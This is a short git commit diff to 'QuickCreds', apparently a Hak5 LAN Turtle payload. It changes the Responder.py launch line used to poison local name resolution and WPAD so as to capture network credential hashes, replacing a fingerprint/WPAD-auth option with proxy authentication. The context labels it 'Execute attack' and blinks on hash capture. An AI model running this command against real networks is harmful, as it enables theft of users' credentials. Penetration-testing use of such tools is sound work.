Update QuickCreds

Replace --ForceWpadAuth option with --ProxyAuth and remove --fingerprint
pull/16/head
Darren Kitchen 2016-09-19 09:55:22 -07:00 committed by GitHub
parent f011a0737f
commit 7749b58116
1 changed files with 1 additions and 1 deletions

View File

@ -112,7 +112,7 @@ ln -s /root/loot/$(printf "%04u" $newdir) /etc/turtle/Responder/logs
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -f -w -r -d -F'
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
# Blink upon hash capture
while true; do